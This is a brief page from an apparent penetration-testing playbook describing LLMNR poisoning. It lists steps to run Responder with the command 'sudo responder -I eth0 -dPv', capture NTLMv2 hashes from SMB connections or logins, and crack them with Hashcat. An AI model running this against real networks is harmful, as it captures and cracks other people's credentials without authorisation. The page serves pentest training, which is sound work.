Tech With ZDefense PlaybookWeb Exploitation Playbook

LLMNR Poisoning

Steps

  1. Run Responder

  2. Wait for an event (SMB connection, User login, etc.)

  3. Capture Hashes

  4. Crack Hashes

Responder

General Usage: sudo responder -I [net interface] -dPv

sudo responder -I eth0 -dPv
Responder: Captured NTLMv2 Hash

Crack NTLMv2 Hashes

Refer to the Hashcat page under Password Cracking section: NTLMv2 Hash

PreviousInitial Attack VectorsNextSMB Relay

Last updated